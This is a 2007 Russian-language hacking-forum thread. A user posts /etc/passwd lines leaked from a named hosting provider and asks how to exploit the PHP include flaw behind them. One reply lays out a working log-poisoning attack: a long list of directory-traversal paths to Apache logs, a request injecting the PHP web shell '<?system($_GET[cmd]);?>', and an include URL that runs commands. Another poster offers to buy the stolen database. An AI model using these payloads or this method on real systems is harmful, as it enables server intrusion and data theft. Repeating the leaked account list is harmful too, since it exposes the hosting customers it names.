Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Как воспользоваться php иньекцией (https://forum.antichat.xyz/showthread.php?t=47790)

ANTI-4URKA 28.08.2007 09:05
Как воспользоваться php иньекцией
 
вот с хостера robo-host.ru
выводиться в таком виде пхп иньекция:
подскажит как воспользоваться и что даёт этот код:

dvdrec:x:32383:32384::/home/dvdrec:/bin/false dyakoff:x:32386:32387::/home/dyakoff:/usr/local/cpanel/bin/noshell

egtgame:x:32388:32389::/home/egtgame:/usr/local/cpanel/bin/jailshell elektrok:x:32391:32392::/home/elektrok:/usr/local/cpanel/bin/jailshell

elitmebe:x:32392:32393::/home/elitmebe:/usr/local/cpanel/bin/jailshell wapoorg:x:32393:32394::/home/wapoorg:/usr/local/cpanel/bin/noshell

ANTI-4URKA 28.08.2007 09:15
что?
обьясни плз я непонимаю (

aka PSIH 28.08.2007 09:16
ищи файл acces_log & error_log
Цитата:
../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log
затем посылай серверу запрос:
GET <?system($_GET["cmd"]);?> HTTP/1.1

HOST: site.com

Затем через инклуд подключаешь найденный access_log, и выполняешь команды...
www.site.com/index.php?page=../../../../../../../../logs/access_log&cmd=id

правда мало шансов что проканает.... :))

Видео
(с)homo-sapiens

n1†R0x 28.08.2007 09:25
Вот еще советую прочитать:
вопрос по etc/passwd

guest3297 28.08.2007 09:39
n1†R0x
Посмотри там 1 пост там есть /etc/passwd.

ANTI-4URKA
Сломаешь стукни мне, возможно куплю бд.

n1†R0x 28.08.2007 09:42
Цитата:
Сообщение от [ cash ]
n1†R0x
Посмотри там 1 пост там есть /etc/passwd.
[ cash ]
В той теме задавался похожий вопрос, "что можно поиметь с etc/passwd". На мой взгляд, ettee достаточно развернуто ответил на него.

guest3297 28.08.2007 09:49
n1†R0x
возможно я наркоман но тут нету постов ettee...

n1†R0x 28.08.2007 09:57
Цитата:
Сообщение от [ cash ]
n1†R0x
возможно я наркоман но тут нету постов ettee...
[ cash ]
В пятом посте ссылочка на тему, я про нее (про тему) и говорил )))


Время: 19:44